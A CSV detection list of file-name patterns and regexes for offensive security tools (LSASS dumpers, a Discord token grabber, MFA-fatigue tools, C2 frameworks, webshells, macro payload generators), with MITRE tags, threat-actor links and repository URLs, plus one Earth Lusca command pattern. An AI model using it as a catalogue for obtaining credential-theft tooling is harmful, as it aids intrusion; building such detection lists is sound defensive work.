"*/Lsass_Shtinkering.cpp*",".{0,1000}\/Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8645" "*/Lsass_Shtinkering.exe*",".{0,1000}\/Lsass_Shtinkering\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8646" "*/lsass64.exe*",".{0,1000}\/lsass64\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8647" "*/LSASSProtectionBypass/CredGuard.c*",".{0,1000}\/LSASSProtectionBypass\/CredGuard\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","8648" "*/LsassReflectDumping.git*",".{0,1000}\/LsassReflectDumping\.git.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","8649" "*/Lsass-Shtinkering.git*",".{0,1000}\/Lsass\-Shtinkering\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8650" "*/LsassSilentProcessExit.git*",".{0,1000}\/LsassSilentProcessExit\.git.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","8651" "*/Lsassx.git*",".{0,1000}\/Lsassx\.git.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8652" "*/Lsassx.ps1*",".{0,1000}\/Lsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8653" 
"*/Lsassx-OBF.ps1*",".{0,1000}\/Lsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8654" "*/lsassy*",".{0,1000}\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8655" "*/lsassy/releases/download/*",".{0,1000}\/lsassy\/releases\/download\/.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8656" "*/lsassy_dump.py*",".{0,1000}\/lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8657" "*/lucksec/CVE-2022-0847*",".{0,1000}\/lucksec\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","N/A","1","1","3","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z","8661" 
"*/lu-enum.nse*",".{0,1000}\/lu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8662" "*/luijait/arpspoofing*",".{0,1000}\/luijait\/arpspoofing.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/luijait/arpspoofing","1","1","N/A","network exploitation tool","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z","8663" "*/luna.log*",".{0,1000}\/luna\.log.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","8664" "*/Luna-Grabber.git*",".{0,1000}\/Luna\-Grabber\.git.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8665" "*/Luna-Grabber/releases/download/*",".{0,1000}\/Luna\-Grabber\/releases\/download\/.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8666" "*/Luna-Grabber/tarball/*",".{0,1000}\/Luna\-Grabber\/tarball\/.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8667" "*/Luna-Grabber/zipball*",".{0,1000}\/Luna\-Grabber\/zipball.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8668" "*/Luna-Grabber-Injection/main*",".{0,1000}\/Luna\-Grabber\-Injection\/main.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8669" "*/ly4k/Pachine*",".{0,1000}\/ly4k\/Pachine.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","8670" "*/lyncsmash/*",".{0,1000}\/lyncsmash\/.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","8671" "*/LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","8672" "*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*",".{0,1000}\/m\s.{0,1000}\.lnk.{0,1000}\s\/c\s.{0,1000}cmd\s\/c\secho\sf\|xcopy\s\@file\s\%temp\%.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8673" "*/m365-fatigue.git*",".{0,1000}\/m365\-fatigue\.git.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. 
It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","8674" "*/m365-fatigue.py*",".{0,1000}\/m365\-fatigue\.py.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","8675" "*/m3-gen.py *",".{0,1000}\/m3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","#linux","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","8676" "*/MAAD-AF.git*",".{0,1000}\/MAAD\-AF\.git.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","8677" "*/MaccaroniC2*",".{0,1000}\/MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","8678" "*/MaceTrap.exe*",".{0,1000}\/MaceTrap\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8679" "*/machine_role.py*",".{0,1000}\/machine_role\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8680" "*/Macker's Private PHPShell.php*",".{0,1000}\/Macker\'s\sPrivate\sPHPShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8681" "*/macro_pack.exe*",".{0,1000}\/macro_pack\.exe.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8682" "*/macro_pack.git*",".{0,1000}\/macro_pack\.git.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8683" "*/macro_pack.py",".{0,1000}\/macro_pack\.py","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8684" "*/macro_pack/releases/download/*",".{0,1000}\/macro_pack\/releases\/download\/.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8685" "*/MacroMeter*",".{0,1000}\/MacroMeter.{0,1000}","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","N/A","10","62","22","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z","8686" "*/MacroPatterns.cs*",".{0,1000}\/MacroPatterns\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","8687" "*/Macro-Payloads.py*",".{0,1000}\/Macro\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - 
TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","8688" "*/MacroWord_Payload/macro.txt*",".{0,1000}\/MacroWord_Payload\/macro\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8689" "*/magnitude.profile*",".{0,1000}\/magnitude\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","8690" "*/mailpv.exe*",".{0,1000}\/mailpv\.exe.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8691" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","8692" "*/MailRaider.ps1*",".{0,1000}\/MailRaider\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","8693" "*/MailSniper/*",".{0,1000}\/MailSniper\/.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 - TA0009 - TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","8694" "*/main/cve-2022-0847.c*",".{0,1000}\/main\/cve\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","8695" "*/main/exploit.js",".{0,1000}\/main\/exploit\.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","8696" "*/main/exploit.pdf",".{0,1000}\/main\/exploit\.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","8697" "*/Maitm/Bells.py*",".{0,1000}\/Maitm\/Bells\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","8698" "*/MakeMeAdmin * x64.msi*",".{0,1000}\/MakeMeAdmin\s.{0,1000}\sx64\.msi.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8699" "*/MakeMeAdmin.git*",".{0,1000}\/MakeMeAdmin\.git.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8700" "*/MakeMeAdmin/tarball*",".{0,1000}\/MakeMeAdmin\/tarball.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8701" "*/MakeMeAdmin/tree/v*/Installers*",".{0,1000}\/MakeMeAdmin\/tree\/v.{0,1000}\/Installers.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","8702" 
